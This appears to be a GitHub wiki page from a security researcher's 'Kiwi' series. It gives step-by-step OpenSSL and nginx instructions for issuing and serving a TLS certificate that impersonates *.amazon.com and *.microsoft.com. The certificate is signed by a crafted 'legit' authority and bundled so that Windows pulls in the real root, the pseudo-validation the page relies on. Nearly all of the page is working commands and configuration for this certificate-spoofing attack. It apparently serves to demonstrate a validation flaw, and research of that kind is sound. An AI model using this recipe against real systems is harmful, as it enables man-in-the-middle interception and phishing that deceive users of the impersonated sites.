Skip to content

1. Kiwi Legit WebServer

Jump to bottom
Benjamin DELPY edited this page Jan 24, 2020 · 6 revisions

Now that you have a Certificate Authority [...]

OpenSSL shared configuration for WebServer

Create a srv.cnf OpenSSL config file with

extensions = extensions

[req]
prompt = no
utf8 = no
distinguished_name = req_distinguished_name
x509_extensions = extensions

[req_distinguished_name]

[extensions]
basicConstraints=critical, CA:FALSE
subjectKeyIdentifier=hash
keyUsage=critical, digitalSignature,keyEncipherment
extendedKeyUsage=serverAuth
subjectAltName=DNS:*.amazon.com, DNS:*.microsoft.com, DNS:secure.server.private
# crlDistributionPoints=crlDistributionPoint
#
# [crlDistributionPoint]
  • Adapt subjectAltName to your configuration ;
  • CRL Distribution Point will make the pseudo-validation fail.

Create RSA private key & signed certificate with the legit authority

openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out srv_microsoft_product.key

openssl req -config srv.cnf -new -sha256 -key srv_microsoft_product.key -subj "/C=FR/CN=Kiwi Microsoft ECC Product Web Server" -out srv_microsoft_product.csr

openssl x509 -req -extfile srv.cnf -in srv_microsoft_product.csr -CA microsoft_product.crt -CAkey ./private/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.key -CAcreateserial -out srv_microsoft_product.crt -days +1825

Must give you:

Signature ok
subject=C = FR, CN = Kiwi Microsoft ECC Product Web Server
Getting CA Private Key

and files: srv_microsoft_product.key & srv_microsoft_product.crt (you can delete srv_microsoft_product.csr & microsoft_product.srl)

Test the WebServer certificate

OpenSSL

cat microsoft_product.crt ./public/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.crt > microsoft_product.legit_with_real.crt

to have a bundle with the legit certificate authority + the real one: it will 'force' Windows to acquire the real one if not already in the root certificate store.

openssl s_server -accept 443 -www -cert srv_microsoft_product.crt -key srv_microsoft_product.key -cert_chain microsoft_product.legit_with_real.crt (as root, or change port)

nginx

cat srv_microsoft_product.crt microsoft_product.crt ./public/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.crt > srv_microsoft_product.legit_with_real.crt

to have a bundle with the server certificate + the legit certificate authority + the real one: it will 'force' Windows to acquire the real one if not already in the root certificate store.`

server {
...
        listen 443 ssl;
        ssl_certificate srv_microsoft_product.legit_with_real.crt;
        ssl_certificate_key srv_microsoft_product.key;
...

Results

Clone this wiki locally